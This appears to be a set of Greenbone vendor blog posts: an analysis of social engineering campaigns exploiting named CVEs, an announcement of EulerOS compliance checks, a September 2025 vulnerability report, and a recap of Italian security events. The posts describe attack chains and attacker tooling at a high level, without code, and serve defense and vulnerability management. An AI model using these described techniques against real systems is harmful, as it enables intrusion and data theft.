Urgency, fear, curiosity, trust, greed, sympathy — social engineering has been wildly successful in exploiting human emotions in cyber attacks. Social engineering attacks have been identified as a top root cause in a high number of breaches. Most breach analysis reports place social engineering among the top initial-access techniques. The recent rise in AI-enabled phishing attacks and data theft further gives adversaries the upper hand with contextual personal data and sensitive business information at their disposal.

Verizon’s 2025 Data Breach and Investigations Report (DBIR) attributes “Social Engineering” incident-class with roughly 17% of breaches globally and 20% in the Asia-Pacific (APAC). According to Sprinto, in 2025, social engineering was the initial access vector in ~36% of incidents. For enterprises, the consequences could be disastrous; ransomware, data theft, and operational downtime can induce revenue-shattering outcomes.

Among the most advanced social engineering campaigns lies a critical one-two punch: psychological manipulation combined with sophisticated exploitation of software flaws. Attack trajectories go beyond the “classical” phishing attack to steal a target’s username and password. They seek immediate unauthorized access to their victim’s computer, lateral movement within the local network, and data exfiltration—with one wrong click, in one fell swoop.

In this article, we will look at some sophisticated social engineering campaigns from the recent past; attacks that combine human deception with exploiting unpatched software flaws. Read on to find out more about the social engineering landscape and how proactive vulnerability management with OPENVAS SECURITY INTELLIGENCE supports a defense-in-depth cyber security strategy, including protection against advanced social engineering attacks.

Advanced Social Engineering Attacks Require a “Defense In Depth” Approach

The most sophisticated social engineering attacks blend human deception with technical exploitation. The classic “phishing attack” [T1566] tricks users into entering their credentials, including MFA codes, into a well-crafted, spoofed website. However, in more advanced variants of social engineering attacks, adversaries can achieve remote code execution (RCE) directly on the victim’s system for full system compromise, install persistent malware, or even move laterally within an organization’s internal network [T1210].

Here’s how sophisticated social engineering attacks work:

• Phishing messages deliver malicious file attachments [T1566.001] or links [T1566.002] along with a social context urging the victim to click them [T1204].
• Once clicked, the attacker’s malicious payload is executed. Depending on the design, it may attempt to steal data [T1003][T1005], exploit exposed software weaknesses on the victim’s local system [T1203], or pivot to accessible network services [T1210].
• In some cases, attackers don’t need to communicate with their targets directly. By making malicious resources available on the public Internet [T1189], victims may confront them through deceptive ads [008] or while executing documents or software applications they believe to be safe [T1189][T1204].
• Even if the first-stage social engineering attack does not directly exploit a software vulnerability, adversaries can import malware [T1105] for remote access to the victim’s computer.
• Once inside, adversaries quickly seek to extend their unauthorized access; gain persistence [TA0003], escalate their privileges [TA0004], and move laterally within the network [TA0008].

In all these cases, unpatched software often means the difference between a benign security incident and an expensive data breach scenario. Defense-in-depth cyber security controls including vulnerability management, patching, and network segmentation help ensure that even if a social engineering attempt succeeds, the attacker cannot extend their reach. By continuously identifying and mitigating exploitable weaknesses, vulnerability management limits the blast radius of initial access and stops localized compromises from spreading across the environment.

How Greenbone Helps Defend Against Advanced Social Engineering Attacks

Greenbone helps organizations increase their resilience to advanced social engineering attacks by empowering defenders to close technical security gaps. Greenbone’s OPENVAS ENTERPRISE FEED includes over 200,000 individual vulnerability tests — truly an industry-leading detection engine. The feed is updated daily to ensure coverage of the latest emerging CVEs. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Vulnerability management is considered a fundamental security activity [1][2][3]. By maintaining a continuous vulnerability management process, organizations can significantly reduce the likelihood that a single phishing email or malicious attachment turns into a full-scale breach. Scanning an IT environment allows security teams to identify and remediate flaws that could provide attackers with initial access, but can also help prevent attackers from escalating privileges, moving laterally, or deploying malware after an initial breach. With Greenbone’s new OPENVAS REPORT product offering, enterprises gain clear risk insights across their entire IT infrastructure and can quickly compile advanced compliance reports.

Social Engineering Campaigns Exploiting Unpatched Software

Many advanced social engineering campaigns are known to exploit unpatched software flaws. In this section we will review some real-world campaigns that leverage advanced exploit chaining via file-attachment and link-based attacks. However, the campaigns described below only scratch the surface of known campaigns and new attacks emerge on a continuous basis.

CVE-2025-8088: WinRAR Allows Attackers to Create Malicious Files

In mid-July 2025, ESET observed active exploitation of CVE-2025-8088 (CVSS 8.8), affecting WinRAR, in ongoing social engineering attacks. CVE-2025-8088 allows unauthorized attackers to copy malicious files into sensitive directories, including the Windows Startup folder, to be executed automatically when the victim logs in. The technical details for this campaign were covered in detail on the Greenbone blog in August.

Attacks were attributed to the RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), a Russian-aligned threat actor known for operating its own signature malware (RomCom RAT). During the recent campaign leveraging CVE-2025-8088 in WinRAR, spearphishing emails delivered weaponized RAR archives to target financial, manufacturing, defense, and logistics companies in Europe and Canada. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-8088.

CVE-2025-27915: Malicious Calendar Links to Exploit Zimbra Collaboration Suite

In September 2025, a campaign targeted the Brazilian Military, delivering poisoned .ICS calendar files specially designed to exploit CVE-2025-27915 (CVSS 5.4), a stored cross-site scripting (XSS) vulnerability [CWE-79], in Zimbra Collaboration Suite. The phishing emails were disguised as legitimate invitations from foreign political entities. The .ICS files contained embedded JavaScript that executed automatically when viewed in Zimbra’s Classic Web Client. The iCalendar standard has an extensive history of security risks including XSS vulnerabilities across a number of enterprise software applications.

In the most recent campaign, attackers were able to steal session cookies, email content, contact lists, and create malicious email forwarding rules to continuously exfiltrate communications from victims. Unpatched systems remain vulnerable and continue to be exploited in targeted attacks. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-27915.

CVE-2025-2783: Chrome Sandbox Escape to Deploy Spyware

In March 2025, phishing emails with invites to a Russian policy forum were used to lure victims into clicking on a malicious file. Once executed, the malicious files leveraged CVE-2025-2783 (CVSS 8.3), a sandbox bypass flaw in the Mojo component of Google Chrome for Windows to deploy spyware. The campaign was nicknamed Operation ForumTroll.

CVE‑2025‑2783 stems from a flaw in the Mojo IPC handle-management and only affects the Windows implementation of Google Chrome that allows attackers to bypass Chrome’s sandbox protection to access Windows OS. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-2783 for Windows [1].

CVE-2025-24054: Windows NTLM Hash Leak Targeted Against European Entities

In March 2025, phishing emails with attached .library-ms files were delivered in attacks targeting government and private firms in Poland and Romania. The attacks targeted a newly disclosed vulnerability, CVE-2025-24054 (CVSS 5.4) impacting Windows NTLM; exploitation began days after the flaw was disclosed.

.library-ms files are Library Description schemas used to define Windows libraries. The malicious .library-ms files contained links to attacker-controlled resources and were delivered inside ZIP archives or linked via Dropbox. Viewing the file exploited the Windows SMB auth feature to steal NTLM authentication hashes and replayed the hashes to achieve domain compromise and lateral movement in the victims’ networks.

CVE‑2024‑21412: Windows SmartScreen Bypass by DarkGate Operators

In mid-January 2024, the threat-actor group behind DarkGate malware began exploiting CVE-2024-21412 (CVSS 8.1), a bypass of Microsoft Defender SmartScreen caused by incorrect internet-shortcut handling. Phishing emails delivered PDF attachments with embedded links, diverting victims to .URL shortcut files which loaded fake software installers. The installers masqueraded as legitimate software (such as NVIDIA or iTunes) and sideloaded a malicious DLL to deploy DarkGate RAT malware.

The campaign targeted financial organizations across North America, Europe, Asia, and Africa. Microsoft issued a patch for CVE-2024-21412 on February 13th, 2024. However, this campaign wasn’t the first campaign exploiting Windows SmartScreen in social engineering attacks. In 2023, CVE-2023-36025 was similarly observed under active exploitation. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2024-21412 [1][2][3][4][5].

CVE-2024-42009: Roundcube Webmail XSS Flaw Exploited by UNC1151

In June 2025, a sophisticated spear-phishing campaign targeted Polish organizations via CVE‑2024‑42009 (CVSS 9.3) affecting the Roundcube Webmail vulnerability. The flaw is a critical cross-site scripting (XSS) flaw that allows arbitrary JavaScript execution in a user’s browser when simply opening a specially crafted email.

In these attacks, the UNC1151 threat group sent invoice-themed emails which triggered the flaw to register a malicious Service Worker on the victim’s browser. The malware then proxied the legitimate Roundcube login page while silently harvesting credentials, stealing address-books, and executing Business Email Compromise (BEC) attacks. Greenbone’s OPENVAS ENTERPRISE FEED provides detection for CVE‑2024‑42009.

CVE-2023-36884: Windows Search Exploited for RCE by Storm-0978

In mid-2023, threat actors leveraged social engineering to exploit CVE-2023-36884 (CVSS 7.5), a race condition flaw [CWE-362] in Windows Search. The campaign, attributed to the RomCom threat actor, distributed Word documents and exploited urgency surrounding the Ukrainian World Congress targeting staff at defense and government entities in Europe and North America. Once opened, the documents downloaded scripts, injected iframes and staged remote malware to exploit CVE-2023-36884.

The campaign resulted in financial losses, data theft, and operational disruption for targeted organizations while enabling espionage via credential compromise and deployment of persistent remote access malware. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2023-36884.

Isn’t User Awareness Training Enough?

Many organizations begin user awareness training programs with high hopes. However, the effectiveness has been called into question. While some findings indicate that training significantly improves recognition of phishing attempts, these gains were found to fade over time without continuous reinforcement [1][2][3]. Improvement was also shown to differ by individual and require time to become effective [4]. Another study found that combining user awareness training with technical controls (e.g., MFA/OTPs and URL/barrier filters) yields better prevention outcomes than training alone [5]. Other studies demonstrated negative findings associated with user awareness training:

• A large-scale study in 2025 found no significant benefits of training on click-rates or reporting rates [6].
• 43% users executed at least one dangerous action over the course of a 15 month study [7].
• Inconsistent reinforcement or unrealistic simulations risk normalizing artificial behaviors, decreasing effectiveness against real-world attacks over time [8].
• While user awareness training showed a slightly positive effect in reducing susceptibility to social engineering, the resulting p-value (0.141) was non-significant [9].
• Annual awareness training did not reduce phishing susceptibility, while simulation-based training resulted in a statistically significant but very small improvement. Furthermore, training has low engagement rates; 75–90% spend less than one minute on training [10].

Therefore, while user awareness training may provide some protection against the most basic social engineering attacks, it is little comfort against highly targeted, sophisticated campaigns.  For high resilience, defenders must plan additional security measures. Vulnerability management is a fundamental defense-in-depth security control for mitigating the impact of sophisticated social engineering attacks. By prioritizing vulnerability patches for assets impacted by flaws identified in active exploitation campaigns, organizations can reduce their risk of unauthorized initial access and prevent a widespread breach.

Summary

The most advanced social engineering attacks are not just out to steal usernames and passwords. Sophisticated social engineering campaigns combine sensitive information to build highly effective triggers. They also deploy technical payloads that seek to exploit software vulnerabilities on the victim’s computer, and within the target’s network. To protect against the worst outcomes, defenders need to use a defense-in-depth strategic approach to cyber security, including continuous vulnerability management. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Using Greenbone’s suite of security tools, defenders are better positioned to detect software vulnerabilities at scale within their IT environments, prioritize, and patch exposed attack surfaces that APT adversaries are poised to exploit. A free trial of OPENVAS BASIC is a great opportunity to put Greenbone’s security capabilities to the test; OPENVAS SECURITY INTELLIGENCE allows organizations to experience first-hand how automated vulnerability scanning, daily feed updates, and clear risk reporting can empower defenders against evolving social engineering and other exploitation campaigns.

Greenbone is excited to announce new compliance policies for Huawei’s EulerOS and openEuler. These compliance policies are the result of close collaboration with Huawei to provide OPENVAS SCAN users with authenticated checks for over 200 key security controls. By thoroughly vetting security settings, defenders gain high degree security assurances and visibility into the security posture of their EulerOS infrastructure.

Out of the box, Operating Systems (OS) are configured for ease of use and flexibility. By default, operating systems are set up to handle almost any task without post-install adjustment. Many unnecessary kernel modules and services are enabled, and security settings are relaxed. For maximum security, organizations need to harden the default post-installation settings to keep critical data and operations secure. Compliance testing turns configuration guidance into verifiable controls so teams can audit security at scale. By verifying hardened security configurations, defenders gain high security assurances that their IT assets are resilient against cyber attack.

OPENVAS SCAN allows IT security teams to automate policy‑driven audits across their IT infrastructure. Our platform already includes a library of compliance profiles for CIS controls in critical cybersecurity areas such as Apache, IIS, NGINX, MongoDB, Oracle, PostgreSQL, Windows and Linux [1][2][3][4] and policies based on national guidance for encryption standards.

Now, we’re expanding our compliance auditing and reporting capabilities with new policy profiles for Huawei’s EulerOS family. These new offerings bring policy checks right into OPENVAS SCAN’s vulnerability management workflow. These security hardening controls apply to EulerOS, OpenEuler, HCE, and EulerOS Virtualization OSs. Once the policy scans have been executed in OPENVAS SCAN, the results can be viewed as a specialized audit report.

Read on to find out more about how these new compliance profiles help IT security teams harden their security posture against cyber attack.

OPENVAS SCAN Now Includes Compliance Profiles for Huawei EulerOS

Greenbone’s new compliance scans for Huawei EulerOS follow our existing policy deployment model. OPENVAS SCAN’s compliance policies are specialized scan configurations composed of targeted Vulnerability Tests (VTs) that evaluate whether hosts meet defined security requirements. The new compliance policies for EulerOS are distributed to OPENVAS SCAN instances via the OPENVAS ENTERPRISE FEED and COMMUNITY FEED.

The new compliance profile curates families of authenticated security checks specially tailored to EulerOS environments. Authenticated auditing ensures that accurate evidence is collected from each scanned endpoint, providing the highest visibility for security attestation. OPENVAS SCAN also offers customized reporting formats, including an executive compliance report suited for management oversight.

To execute an audit, users can configure remote access for authenticated scans,  select a policy, run the policy scan task, and view an evidence‑rich audit report that shows which controls passed, failed, or require further manual investigation. Policies are managed in OPENVAS SCAN’s Compliance Policies area and executed as vulnerability scans with the same level of control as other scan configurations: alerting, reporting, and scheduling to verify continuous compliance.

What Do the New Huawei EulerOS Compliance Policies Cover?

The new Huawei EulerOS profile’s goal is simple: reduce attack surface by verifying secure settings on every host. The policy scan aggregates over 200 of distinct security checks across Linux networking, services and local configuration. The policy tests resemble the CIS Benchmarks, while aligning with Huawei’s platform specifics requirements. The new EulerOS compliance policies can also be adjusted to support each organization’s internal policy needs.

The new EulerOS compliance policies include:

• Service Hardening: Ensures unnecessary or insecure network services (e.g., DNS, NFS, RPC, SNMP, HTTP, Avahi) are disabled or not installed to reduce the system’s attack surface.
• System Configuration and Kernel Security: Validates secure kernel parameters, sysctl settings, ICMP behavior, address space layout randomization (ASLR), and protection mechanisms like dmesg_restrict.
• Authentication and Access Control: Enforces strong password policies, account lockout rules, sudo configurations, and user access restrictions to prevent unauthorized access.
• File and Directory Permissions: Checks critical system files (e.g., /etc/passwd, /etc/shadow, SSH keys) and directories for proper ownership and secure permissions.
• Password Policy Enforcement: Checks for password complexity, minimum length, expiration period, history count, retry limits, and lockout mechanisms to ensure strong authentication hygiene.
• User Account and Privilege Management: Reviews active user accounts for unused, duplicate, or privileged users; ensures direct root login is disabled and only necessary users have shell access.
• Boot and Initialization Security: Validates GRUB configurations, bootloader protections, secure boot settings, and kernel module restrictions.
• Firewall and Network Traffic Control: Ensures proper iptables/nftables/firewalld configurations for INPUT/OUTPUT policies and default zones to limit unauthorized network communication.
• Package and Software Management: Checks for secure package management practices, disallows installation of unnecessary or insecure software, and confirms that package repositories are configured correctly.
• CVE Discovery and Vulnerability Detection: Identifies known vulnerabilities (CVEs) present on the system by checking installed packages against vulnerability feeds. This helps prioritize remediation of exploitable software flaws based on real-world threat data.
• Logging and Auditing: Verifies audit rules for privileged commands, tracks access to sensitive files, configures rsyslog for remote logging, and ensures audit logs are properly stored and managed.

These security checks are implemented as Vulnerability Tests (VTs), grouped into families, and referenced from the EulerOS policy object. OPENVAS SCAN ships with many other platform‑specific VT families—including Huawei EulerOS Local Security Checks—which are enabled inside of the new policies to collect host‑level evidence of CVE exposure in addition to configuration hardening.

Which Huawei EulerOS Distributions are Covered?

Greenbone’s new compliance profiles are designed for the EulerOS ecosystem including distributions for enterprise and cloud deployments. Delivery is simple: the new Huawei EulerOS compliance profiles are provided via OPENVAS COMMUNITY FEED for Greenbone’s OPENVAS SCAN product. Users receive them with routine feed updates similar to other default policies. This ensures your policy content stays up to date without additional maintenance.

Here is a description  of each EulerOS distribution covered in Greenbone’s new compliance profiles and a brief description of the OS-specific security coverage.

EulerOS (Traditional/Enterprise)

Coverage focuses on EulerOS 2.0 service packs published by Huawei. OPENVAS SCAN maps each compliance test to Huawei’s official EulerOS security advisories portal, the EulerOS Security Configuration Baseline, and EulerOS lifecycle information. This includes service packs SP9 and newer.

EulerOS Virtual (VM Editions)

For data centers that rely on EulerOS Virtual for x86_64 and ARM64 architecture, our new compliance profiles recognize EulerOS Virtual versions—including releases 2.9.x, 2.10.x, 2.11.x, 2.12.x, 2.13.x. They also include checks for virtualization‑specific packages and services accordingly (for example, KVM/QEMU components and their hardening/patch levels).

openEuler (Community)

For organizations that standardize on openEuler LTS, Greenbone consumes the CSAF‑formatted advisories published by the openEuler project and aligns compliance checks using OS version awareness. The openEuler lifecycle and downloads page document the available LTS releases and service packs. The compliance profiles support auditing versions 20.03, 22.03, 24.03 based on openEuler Security Configuration Baseline.

Huawei Cloud EulerOS (HCE)

For Huawei Cloud EulerOS (HCE) 2.0 and HCE 3.0 cloud deployments, our new compliance profiles leverage publicly available advisories to validate HCE package baselines and configuration hardening specific to cloud images and managed repositories—recognizing differences such as package managers and repo layout between.

Summary

Greenbone’s new compliance profiles for EulerOS distributions extend OPENVAS SCAN’s capabilities with policy‑driven audits. The policies can be used to attest the hardened security posture of EulerOS, EulerOS Virtual, openEuler and HCE. Delivered through the OPENVAS COMMUNITY FEED, the audits execute authenticated checks to verify secure baselines for a wide scope of attack surface. The profiles are also complemented with detailed technical and executive reporting for stakeholders. These new tools enhance OPENVAS SCAN as a reliable way to harden Huawei-based Linux fleets at enterprise scale.

In total, just over 4,500 CVEs were published in September, exposing defenders to new risk. For operational resilience, organizations need to scan their IT infrastructure to identify where hidden risk could impact their operations. A free trial of Greenbone’s OPENVAS BASIC allows defenders to scan their enterprise IT infrastructure to stay on top of emerging threats. This free trial includes access to Greenbone’s OPENVAS ENTERPRISE FEED, an industry-leading coverage for CVEs and other IT security vulnerabilities.

So far in September, our blog has covered three emerging cyber security events: SessionReaper, an unauthenticated RCE flaw in Adobe Commerce and Magento, CVSS 10 exposed in Fortra GoAnywhere MFT, and an ArcaneDoor espionage campaign actively exploiting a new vulnerability in Cisco ASA and FTD. In this edition of the monthly threat report, we will cover other high-risk threats from September 2025.

Emerging Threats to Linux Systems

Linux OS is the backbone of global IT infrastructure. As attackers increasingly target Linux environments, vulnerability scanning is essential for operational resilience and service continuity. Here are the top vulnerabilities to Linux disclosed in September 2025.

High-Severity Sudo Flaw is Now Actively Exploited

In July, the Greenbone Threat Report flagged an emerging threat: CVE-2025-32463 (CVSS 7.8) permits unauthorized privilege escalation [TA0004] to root by tricking the Linux sudo command (all releases ≥ 1.9.14 and before 1.9.17p1) into loading attacker-controlled shared libraries [T1129]. CVE-2025-32463 is now being actively exploited and has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Canada’s Cyber Centre has issued a new CERT advisory, adding to the existing alerts [1][2][3]. Organizations cannot achieve high resilience while waiting for known vulnerabilities to be flagged as actively exploited. Greenbone added detection tests for CVE-2025-32463 to the OPENVAS ENTERPRISE FEED and COMMUNITY FEED immediately in July 2025, giving users advanced detection and the opportunity to patch.

CVE-2025-38352 POSIX CPU TOCTOU Race in the Linux Kernel
CVE-2025-38352 (CVSS 7.4, EPSS ~70th pctl) is a time-of-check to time-of-use (TOCTOU) flaw [CWE-367] in Linux kernel’s POSIX CPU timers. CVE-2025-38352 allows denial of service (DoS) [T1499] on affected systems and has been added to CISA’s KEV. While no public proof-of-concept (PoC) exploit is available, security researchers have published a detailed technical analysis.

The German BSI has issued two alerts for CVE-2025-38352: one for the Linux kernel [1] and one for Android [2]. Greenbone’s OPENVAS ENTERPRISE FEED and COMMUNITY FEED include patch-level checks for Linux distributions.

High-Severity Vulnerability in Linux UDisks Daemon
CVE-2025-8067 (CVSS 8.5) is a local, unauthenticated privilege escalation [TA0004] flaw in Red Hat Enterprise Linux’s (RHEL) UDisks daemon. The UDisks daemon is a system service for managing storage devices such as hard drives, SSDs, USB drives, optical media, and partitions. The root cause of CVE-2025-8067 is improper handling of negative integer indexes, which can trigger an out-of-bounds memory read [CWE-125]. Exploitation can result in DoS [T1499], or local privilege escalation [T1068] by mapping a loop device to a privileged local file [1].

There’s no indication of active exploitation, but PoC code has been published [2][3]. Germany’s BSI has issued a security advisory [4]. The OPENVAS ENTERPRISE FEED and COMMUNITY FEED include package patch-level checks for many Linux distributions. Patching is the only viable mitigation.

New ImageMagick CVEs Pose DoS and RCE Risks
CVE-2025-53014 (CVSS 9.8), CVE-2025-53019 (CVSS 7.5), and CVE-2025-53101 (CVSS 9.8) arise from improper processing of image filenames [CWE-66] in the ImageMagick packages for Linux. Exploitation could reportedly lead to DoS [T1499] and arbitrary code execution [T1203] in the case of CVE-2025-53101. Although these three CVEs aren’t known to be actively exploited in the wild, the German BSI has issued a CERT-Bund Advisory [WID-SEC-2025-1537]. The OPENVAS ENTERPRISE FEED and COMMUNITY FEED include detection checks across many Linux distributions.

Multiple High-Risk Security Issues in Cisco Products

CVE-2025-20352 and CVE-2025-20312 (both CVSS 7.7) capped off a tumultuous month for Cisco products. Both CVEs were published on September 24th, 2025. CVE-2025-20352 was discovered by Cisco while fulfilling a customer’s technical support case. The flaw was added to CISA KEV five days later and advisories have been issued by several national CERT agencies [1][2][3][4][5][6][7]. Both CVEs are in the Simple Network Management Protocol (SNMP).

CVE-2025-20352 is due to a stack overflow [CWE-121] in the SNMP subsystem of affected products: IOS/IOS XE (all SNMP versions) and Meraki MS390/Catalyst 9300 running Meraki CS 17 or earlier. Exploitation allows authenticated DoS and potentially root-level RCE, depending on the credentials possessed by the attacker. DoS is possible with an SNMPv1/v2c read-only community string or valid SNMPv3 user credentials. To achieve root-level RCE, administrative (privilege 15) credentials for the device are required.

CVE-2025-20312 allows an authenticated remote attacker to cause a DoS. The flaw is caused by improper error handling that allows the system to enter into an infinite loop when parsing crafted SNMP requests [CWE-835]. Exploitation requires a valid SNMP community string with either read-write or read-only permissions. Affected systems are limited to IOS XE switches with both SNMP enabled and WRED for MPLS EXP configured.

No public exploits are available for either CVE. Users who cannot patch may mitigate the vulnerability by limiting SNMP access to trusted network entities and disabling the vulnerable Object Identifiers (OIDs). Cisco has published advisories for each CVE separately [8][9];. The OPENVAS ENTERPRISE FEED provides both authenticated and remote version detection tests for the actively exploited CVE-2025-20352 [10][11] and a remote version detection check for CVE-2025-20312 [12].

Twice-Patched Flaw in SolarWinds Help Desk Still Vulnerable

CVE-2025-26399 (CVSS 9.8) is an unauthenticated RCE vulnerability in SolarWinds Web Help Desk 12.8.7 and all prior versions. The CVE is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986. The original CVE-2024-28986 was added to CISA’s KEV catalog shortly after its disclosure. While there are no confirmed reports of this latest bypass being exploited in the wild, security experts believe exploitation is likely. The root cause remains the same: flawed deserialization of untrusted data [CWE-502] in the product’s AjaxProxy component.

National CERT advisories have been issued by Canada’s CCCS, CERT-FR, and Spain’s INCIBE-CERT. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner version check, allowing security teams to identify affected instances. Given the critical severity and history of exploitation, applying the Web Help Desk 12.8.7 Hotfix 1 patch is strongly recommended.

Sitecore XM, XP, and XC Actively Exploited

CVE-2025-53690 (CVSS 9.0, EPSS ~95th pctl) is a deserialization vulnerability [CWE-502] affecting Sitecore Experience Manager (XM), Experience Platform (XP),

Experience Commerce (XC), and some Managed Cloud instances. Unauthenticated attackers can craft malicious __VIEWSTATE payloads to achieve RCE with admin privileges. The vulnerability is under active attack and has been added to CISA’s KEV, joining other exploited SiteCore flaws. At least one Sitecore CVE is known to be leveraged in ransomware attacks.

Attackers are leveraging CVE-2025-53690 to deploy a novel reconnaissance malware dubbed “WEEPSTEEL”. The malware performs host and network discovery [TA0043], exfiltrates sensitive configuration files [TA0010], and escalates privileges [TA0004] by creating local Administrator accounts.

Techniques observed in the attacks include:

• Using Earthworm [1][2][3] for network tunneling [T1572]
• Using DWAgent [4][5] for command-and-control (C2) remote access [T1219]
• Using SharpHound [4][5] for Active Directory (AD) reconnaissance [T1106]
• Using GoTokenTheft to dump SYSTEM/SAM hives for credential harvesting [T1003]
• Exploiting Windows Remote Desktop Protocol (RDP) [T1021] with stolen credentials [T1078] to pivot laterally through the network [TA0008]

The OPENVAS ENTERPRISE FEED includes a remote banner version check for detecting affected Sitecore products. Sitecore’s official advisory strongly urges users to rotate machine keys, enable ViewState MAC, review IoCs, and audit for signs of compromise.

“Exploitation More Likely” for Nine CVEs in Microsoft’s September Patch Cycle

Microsoft’s September patch cycle addresses 97 flaws; 9 rated critical, with the majority rated Important. Affected products include the Windows OS, SMB, NTFS, and NTLM, Microsoft Office, Azure, SQL Server, Hyper-V, DirectX, and more. Microsoft flagged nine vulnerabilities with an “Exploitation More Likely” status:

• CVE-2025-55234
  (CVSS 9.8): Improper authentication [CWE-287] in Windows’ SMB services could allow attackers to replay stolen credentials to gain privileged access under certain conditions. Customers who have not enabled SMB hardening measures are advised to assess their environment and apply either SMB Server signing SMB Server Extended Protection for Authentication (EPA).
• CVE-2025-55319 (CVSS 9.8): A command injection flaw [CWE-77] in Agentic AI integrations for Visual Studio Code (version 1.0.0 before 1.104.0) allows RCE for an unauthorized attacker. Users should update to the most recent version of Visual Studio Code [1].
• CVE-2025-54110 (CVSS 8.8): A vulnerability in the Windows kernel involving an integer overflow / wraparound [CWE-190] can allow a local attacker to escape AppContainer Isolation. This can allow privilege escalation to the SYSTEM level and execution of arbitrary code [2].
• CVE-2025-54918 (CVSS 8.8): An authentication flaw [CWE-287] in NTLM allows an authenticated attacker to remotely escalate privileges to the SYSTEM level, enabling full control of a Windows host [3].
• CVE-2025-54916 (CVSS 7.8): A buffer handling bug [CWE-120] in the NTFS file system driver can be triggered by specially crafted input, leading to arbitrary code execution for an authenticated local attacker [4].
• CVE-2025-54098 (CVSS 7.8): Hyper-V virtualization implements improper access control [CWE-284] that permits a malicious guest VM to escape to the host or gain elevated privileges within the hypervisor [5].
• CVE-2025-54093 (CVSS 7.0): A TOCTOU race condition [CWE-367] in Windows TCP/IP could allow local attackers to gain elevated privileges via precise timing attacks [6].
• CVE-2025-53803 (CVSS 5.5): A vulnerability in the Windows kernel results in error messages that leak sensitive information [CWE-209] to a local authenticated attacker, including sensitive memory addresses within kernel space [7].
• CVE-2025-53804 (CVSS 5.5): An information-disclosure vulnerability [CWE-200] in the Windows kernel subsystem enables a local user to determine sensitive memory addresses within kernel space [8].

Organizations that do not attest patch levels across their IT infrastructure are at increased risk of harboring exploitable security gaps that attackers may exploit. Greenbone’s OPENVAS ENTERPRISE FEED frequently updates detection for the latest Microsoft vulnerabilities.

Summary

September 2025 underscored escalating cyber risks for many popular enterprise software platforms. Critical flaws in Fortra GoAnywhere MFT, Cisco ASA/FTD, and Sitecore were among thousands of new CVEs shaping the month’s threat landscape. Active cyber attack campaigns highlight the urgency of proactive vulnerability management. Regular scanning with Greenbone’s OPENVAS ENTERPRISE FEED enables defenders to detect and mitigate emerging risks before attackers exploit them. A free trial of Greenbone’s OPENVAS BASIC allows defenders to stay on top of emerging threats.

Cybersecurity has moved from boardroom buzzword to front-page reality in Italy this year. Walk into any conference room, attend any summit, or join any industry discussion, and you’ll hear the same urgent conversations: companies are under pressure from increasingly sophisticated cyber threats. However, there’s also something new happening – a wave of innovation and collaboration that’s finally matching the scale of the challenge.

From Abstract Risks to Real Solutions

The year started strong at ITASEC in February, where something refreshing emerged. Instead of the usual doom-and-gloom presentations about theoretical vulnerabilities, real solutions were finally taking center stage. Organizations shared practical strategies for balancing compliance requirements like NIS2 with the daily reality of cyberattacks.

The sessions on OPENVAS and enterprise solutions revealed a crucial shift: companies are moving beyond endless vulnerability spreadsheets toward actionable intelligence. The message was clear: staying informed isn’t enough anymore. Organizations need concrete guidance on their next steps in the future.

But beneath the optimism, a sobering truth emerged from every conversation: Italy remains one of Europe’s most targeted countries. Participants weren’t shy about asking the hard questions: Why do our defenses still lag behind the threats? What will it actually take to turn the tide?

AI: The Double-Edged Sword

March brought CyberSec 2025 in Milan, where artificial intelligence dominated every discussion. The atmosphere was electric, with equal parts of excitement and apprehension. Everyone agreed that AI could revolutionize security operations, making them faster and smarter. But there was a catch: AI also creates entirely new attack surfaces.

The concerns were legitimate. AI models can be manipulated or stolen if not properly secured. That’s why approaches like keeping solutions fully on-premise and updating AI models only through controlled feeds have become so critical. It’s about getting the benefits of automation and intelligence without sacrificing security integrity.

As Dirk Boeing, Security Engineer at Greenbone , emphasized in the interview: “AI isn’t just a buzzword for us – it’s a practical tool that, when used responsibly, helps organizations fight back against cyber attacks.”

The New Reality of Vulnerability Management

The Security Summit later in March highlighted another fundamental shift: the end of occasional scanning as an acceptable security practice. Today’s threat landscape demands continuous, robust monitoring. We saw organizations learning to prioritize critical vulnerabilities, streamline remediation processes, and even transform regulatory compliance from a burden into a competitive advantage.

What stood out was the growing recognition that enterprise solutions offer something community editions simply can’t match: stable feeds, accurate detection, and secure on-premise deployment that goes far beyond basic functionality.

The Numbers Don’t Lie

These conference insights take on new urgency when having a look at what’s actually happening in Italy. The first half of 2025 alone brought 1,549 cyber incidents – a staggering 53% increase compared to 2024. Even more concerning: 346 of these were classified as serious, confirmed-impact events, representing a 98% year-over-year increase.

The attacks aren’t discriminating. Critical sectors like public administration, healthcare, and energy have all been hit hard. Take the attack on April 2 on Mobilità di Marca (MOM), Treviso’s public transport company, which knocked out electronic ticketing services for days. It’s a perfect example of how digital infrastructure vulnerabilities can disrupt everyday life.

Smaller companies aren’t escaping either. April reports showed the telecommunications sector getting hammered by spear-phishing attacks, with numerous organizations suffering significant breaches.

What’s Next: Proactive Defense Is the Only Defense

Every expert at every conference has been saying the same thing: continuous monitoring and proactive vulnerability management aren’t just “nice-to-haves” anymore. They’re survival requirements. The escalating frequency and sophistication of attacks demand a fundamental shift from reactive firefighting to proactive defense strategies.

Mark Your Calendar: October Events You Can’t Miss

The conversation continues this October, with three major events putting Rome at the center of Italy’s cybersecurity evolution:

AFCEA TechNet Europe Rome 2025 (October 1 – 2) brings together defense experts, industry leaders, and technology innovators to explore emerging threats and cutting-edge solutions.

Cybertech Europe (October 21 – 22) offers the chance to connect with top cybersecurity minds, see live demonstrations, and dive deep into the challenges and solutions shaping Italy’s digital resilience.

Richmond Cyber Resilience Forum (October 28 – 30) is a meeting point between demand and supply of innovative solutions. Here, Italian companies meet industry experts to discover trends and strategies of cybersecurity.

